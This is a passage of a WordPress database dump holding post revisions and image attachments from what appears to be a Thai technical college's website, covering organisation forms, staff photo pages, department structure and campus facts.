(2784, 1, '2018-05-28 10:41:17', '2018-05-28 03:41:17', '<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์มอื่นๆ ขององค์การนักวิชาชีพฯ <a href=\"http://www.technicrayong.ac.th/แบบฟอร์มอื่นๆ-ของงานองค\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-05-28 10:41:17', '2018-05-28 03:41:17', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(2786, 3, '2018-05-28 10:44:40', '2018-05-28 03:44:40', '', 'รองอานุภาพ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%ad%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%a0%e0%b8%b2%e0%b8%9e-2', '', '', '2018-05-28 10:44:40', '2018-05-28 03:44:40', '', 2555, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รองอานุภาพ-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2787, 3, '2018-05-28 10:47:22', '2018-05-28 03:47:22', '', 'อ.ฉัตรเฉลิม', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad-%e0%b8%89%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%89%e0%b8%a5%e0%b8%b4%e0%b8%a1', '', '', '2018-05-28 10:47:22', '2018-05-28 03:47:22', '', 2555, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อ.ฉัตรเฉลิม.png', 0, 'attachment', 'image/png', 0),
(2788, 3, '2018-05-28 10:57:01', '2018-05-28 03:57:01', '', 'นายก', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%81', '', '', '2018-05-28 10:57:01', '2018-05-28 03:57:01', '', 2555, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/นายก.jpg', 0, 'attachment', 'image/jpeg', 0),
(2789, 3, '2018-05-28 10:59:39', '2018-05-28 03:59:39', '', 'รอง 2', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87-2', '', '', '2018-05-28 10:59:39', '2018-05-28 03:59:39', '', 2555, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รอง-2.jpg', 0, 'attachment', 'image/jpeg', 0),
(2790, 3, '2018-05-28 11:03:49', '2018-05-28 04:03:49', '', '28-5-2561 11-05-34', '', 'inherit', 'closed', 'closed', '', '28-5-2561-11-05-34', '', '', '2018-05-28 11:03:49', '2018-05-28 04:03:49', '', 2555, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/28-5-2561-11-05-34.jpg', 0, 'attachment', 'image/jpeg', 0),
(2791, 3, '2018-05-28 11:04:48', '2018-05-28 04:04:48', '<h3><img class=\"aligncenter wp-image-2786 size-medium\" src=\"/wp-content/uploads/2018/05/รองอานุภาพ-1-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2787\" src=\"/wp-content/uploads/2018/05/อ.ฉัตรเฉลิม-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2788\" src=\"/wp-content/uploads/2018/05/นายก-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2789\" src=\"/wp-content/uploads/2018/05/รอง-2-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter wp-image-2790 size-full\" src=\"/wp-content/uploads/2018/05/28-5-2561-11-05-34.jpg\" alt=\"\" width=\"835\" height=\"630\" /></h3>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์มอื่นๆ ขององค์การนักวิชาชีพฯ <a href=\"/แบบฟอร์มอื่นๆ-ของงานองค\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-05-28 11:04:48', '2018-05-28 04:04:48', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(2796, 3, '2018-05-30 08:38:01', '2018-05-30 01:38:01', '<h3><img class=\"aligncenter size-medium wp-image-2787\" src=\"/wp-content/uploads/2018/05/อ.ฉัตรเฉลิม-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2788\" src=\"/wp-content/uploads/2018/05/นายก-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2789\" src=\"/wp-content/uploads/2018/05/รอง-2-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter wp-image-2790 size-full\" src=\"/wp-content/uploads/2018/05/28-5-2561-11-05-34.jpg\" alt=\"\" width=\"835\" height=\"630\" /></h3>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์มอื่นๆ ขององค์การนักวิชาชีพฯ <a href=\"/แบบฟอร์มอื่นๆ-ของงานองค\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-05-30 08:38:01', '2018-05-30 01:38:01', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(2797, 3, '2018-05-30 09:26:19', '2018-05-30 02:26:19', '', '30-5-2561 9-22-41', '', 'inherit', 'closed', 'closed', '', '30-5-2561-9-22-41', '', '', '2018-05-30 09:26:19', '2018-05-30 02:26:19', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-9-22-41.jpg', 0, 'attachment', 'image/jpeg', 0),
(2798, 3, '2018-05-30 09:26:57', '2018-05-30 02:26:57', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-2797\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-22-41.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-05-30 09:26:57', '2018-05-30 02:26:57', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(2799, 3, '2018-05-30 09:49:33', '2018-05-30 02:49:33', '', '30-5-2561 9-51-29', '', 'inherit', 'closed', 'closed', '', '30-5-2561-9-51-29', '', '', '2018-05-30 09:49:33', '2018-05-30 02:49:33', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg', 0, 'attachment', 'image/jpeg', 0),
(2800, 3, '2018-05-30 09:50:23', '2018-05-30 02:50:23', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-2797\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-22-41.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-05-30 09:50:23', '2018-05-30 02:50:23', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2801, 3, '2018-05-30 09:52:06', '2018-05-30 02:52:06', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-2797\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-22-41.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-2799 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-05-30 09:52:06', '2018-05-30 02:52:06', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(2803, 3, '2018-05-30 09:53:10', '2018-05-30 02:53:10', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n ', 'งานศูนย์ข้อมูล', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-05-30 09:53:10', '2018-05-30 02:53:10', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2805, 3, '2018-05-30 10:00:21', '2018-05-30 03:00:21', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-978\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"192\" height=\"210\" />\r\n\r\n<span style=\"color: #ffffff;\">------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-985\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"273\" height=\"66\" />\r\n\r\n<img class=\"aligncenter wp-image-2804 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-10-00-17.jpg\" alt=\"\" width=\"818\" height=\"303\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-05-30 10:00:21', '2018-05-30 03:00:21', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(2806, 3, '2018-05-30 10:25:11', '2018-05-30 03:25:11', '', '30-5-2561 10-26-55', '', 'inherit', 'closed', 'closed', '', '30-5-2561-10-26-55', '', '', '2018-05-30 10:25:11', '2018-05-30 03:25:11', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-10-26-55.jpg', 0, 'attachment', 'image/jpeg', 0),
(2807, 3, '2018-05-30 10:25:42', '2018-05-30 03:25:42', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span>\r\n\r\n<span style=\"color: #ffffff;\">----------------------------------<img class=\"aligncenter wp-image-2806 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-10-26-55.jpg\" alt=\"\" width=\"838\" height=\"589\" />--------------------------------------------------</span>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-05-30 10:25:42', '2018-05-30 03:25:42', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(2809, 3, '2018-05-30 13:40:27', '2018-05-30 06:40:27', '<h2><span style=\"color: #800000;\"><strong>ป้ายวิทยาลัยเทคนิคระยอง</strong></span></h2>\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n<h4></h4>\r\n<h2><strong><span style=\"color: #800000;\">ที่ตั้งสถานศึกษา</span></strong></h2>\r\n<h3><strong><span style=\"color: #3366ff;\">เลขที่ 83/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง</span></strong></h3>\r\n<h3><strong><span style=\"color: #3366ff;\">จังหวัดระยอง รหัสไปรษณีย์ 21000</span></strong></h3>\r\n<h2><span style=\"color: #800000;\"><strong>เนื้อที่สถานศึกษา</strong></span></h2>\r\n<h3><span style=\"color: #3366ff;\"><strong>76 ไร่ 2 งาน 17 ตารางวา </strong></span></h3>\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\r\n<h2><strong><span style=\"color: #800000;\">มีอาคาร</span> <span style=\"color: #3366ff;\">27</span> <span style=\"color: #800000;\">หลัง</span> <span style=\"color: #800000;\">มีห้อง</span> <span style=\"color: #3366ff;\">406</span> <span style=\"color: #800000;\">ห้อง</span> <span style=\"color: #800000;\">ได้แก่</span></strong></h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/อาคารโรงยิม\"><strong><span style=\"color: #3366ff;\">1. อาคารโรงยิม</span></strong></a></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">2. อาคารคหกรรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">3. อาคารการท่องเที่ยว</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">4. อาคารสารสนเทศ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">5. อาคารช่างเชื่อมเก่า</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">6. อาคารอิเล็กทรอนิกส์</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">7. อาคารบริหารธุรกิจ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">8. อาคารปิโตรเคมี</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">9. อาคารโรงอาหาร</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">11. อาคารช่างก่อสร้าง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">12. อาคารตึกอำนวยการ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">13. อาคาร Fix-it</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">14. อาคารพัสดุ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">16. อาคารเรียนสามัญ</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">17. 